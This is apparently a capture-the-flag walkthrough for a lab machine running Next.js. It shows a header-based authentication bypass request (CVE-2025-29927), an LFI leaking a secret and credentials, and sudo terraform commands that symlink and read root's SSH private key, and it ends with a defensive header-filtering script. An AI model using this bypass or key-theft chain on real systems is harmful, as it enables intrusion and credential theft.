# Previous

## Overview
Previous runs a Next.js application vulnerable to middleware authentication bypass (CVE-2025-29927) via a malicious x-middleware-subrequest header. The authenticated docs section exposes an LFI in a download endpoint, leaking the NEXTAUTH_SECRET and a hardcoded credential in an auth JS file. The credential works for SSH. Privilege escalation abuses a sudo-allowed terraform command - by symlinking root's SSH private key into terraform's working directory and using an environment variable, the key is read and displayed during the apply operation.
## Recon

### Nmap
Ports 22 (SSH) and 80 (HTTP) are open. Port 80 serves the virtual host previous.htb; add it to /etc/hosts.
## Foothold

### CVE-2025-29927 - Next.js Middleware Bypass
Next.js middleware runs before a request is routed and is commonly where authentication checks live. CVE-2025-29927 bypasses the middleware entirely: when a request carries the x-middleware-subrequest header, the framework treats it as one of its own internal subrequests and skips middleware execution.
Send the header to access protected routes (like /docs) without authentication:
```http
GET /docs HTTP/1.1
Host: previous.htb
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```

### LFI in /api/download
Inside the docs section, the /api/download endpoint takes an example parameter that is vulnerable to LFI:
Read sensitive files from the server filesystem:
Reading .env leaks the NextAuth secret:

```
NEXTAUTH_SECRET=82a464f1c3509a81d5c973c31a23c61a
```

Continue reading application source files. The auth.js file contains a hardcoded username and password:
The hardcoded password works for SSH as jeremy.
## Privilege Escalation

### Terraform Symlink Attack
Check sudo permissions:
```
sudo -l
```

jeremy can run:

```
sudo /usr/bin/terraform -chdir\=/opt/examples apply
```

Terraform reads resource definitions from the .tf files in the directory given by -chdir. The file() function reads a local file into the configuration, and a TF_VAR_source_path environment variable sets the source_path input variable, overriding its default.
Create a directory structure under the home directory to satisfy terraform's path requirements, then create a symlink to root's SSH private key:
```bash
cd /home/jeremy
mkdir -p root/examples
ln -s /root/.ssh/id_rsa /home/jeremy/root/examples/id_rsa
export TF_VAR_source_path=/home/jeremy/root/examples/id_rsa
sudo /usr/bin/terraform -chdir\=/opt/examples apply
```

When terraform runs the apply with our TF_VAR_source_path, it follows the symlink, reads root's private key, and outputs or processes its contents. Copy the key and SSH in as root.
## Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | Nmap + vhost | previous.htb Next.js app |
| Auth bypass | CVE-2025-29927 middleware header | Access to /docs |
| LFI | /api/download?example | NEXTAUTH_SECRET + hardcoded creds |
| SSH | Hardcoded password | Shell as jeremy |
| Privesc | Terraform symlink + TF_VAR_source_path | Root SSH key read |
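As an added defender-side example (not code from the original writeup), the following edge filter flags and strips the x-middleware-subrequest header used in the foothold above; the request objects and the `inspectRequest`/`auditRequests` names are assumptions, and the sample requests are constructed.

```javascript
// Added example, not from the original writeup. Edge-side filter for the
// header abused by CVE-2025-29927: Next.js sets x-middleware-subrequest only
// on its own internal subrequests, so an external client sending it is a
// bypass attempt. Keeping the header from reaching the app is the vendor's
// interim mitigation; upgrading Next.js remains the real fix.
const BLOCKED_HEADER = "x-middleware-subrequest";

// Lower-case all header names so mixed-case variants are matched too.
function normalizeHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    out[name.toLowerCase()] = String(value);
  }
  return out;
}

// Inspect one inbound request {method, path, headers}. Returns whether to
// block, a reason for the alert, and the headers with the dangerous one
// removed (for deployments that prefer stripping over rejecting).
function inspectRequest(req) {
  const headers = normalizeHeaders(req.headers);
  if (!Object.prototype.hasOwnProperty.call(headers, BLOCKED_HEADER)) {
    return { block: false, reason: null, headers };
  }
  // The segment count is logged as context for the alert; any value blocks.
  const segments = headers[BLOCKED_HEADER].split(":").filter(Boolean).length;
  const sanitized = { ...headers };
  delete sanitized[BLOCKED_HEADER];
  return {
    block: true,
    reason: `${BLOCKED_HEADER} from external client (${segments} segment(s)) on ${req.method} ${req.path}`,
    headers: sanitized,
  };
}

// Constructed sample of requests as a reverse proxy might log them.
const SAMPLE_REQUESTS = [
  { method: "GET", path: "/docs", headers: { "X-Middleware-Subrequest": "middleware:middleware:middleware:middleware:middleware" } },
  { method: "GET", path: "/", headers: { "user-agent": "Mozilla/5.0" } },
  { method: "GET", path: "/docs", headers: { "x-middleware-subrequest": "src/middleware" } },
];

// Run the filter over a batch and return only the alert reasons.
function auditRequests(requests) {
  return requests.map(inspectRequest).filter((v) => v.block).map((v) => v.reason);
}

console.log(auditRequests(SAMPLE_REQUESTS).join("\n"));
```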

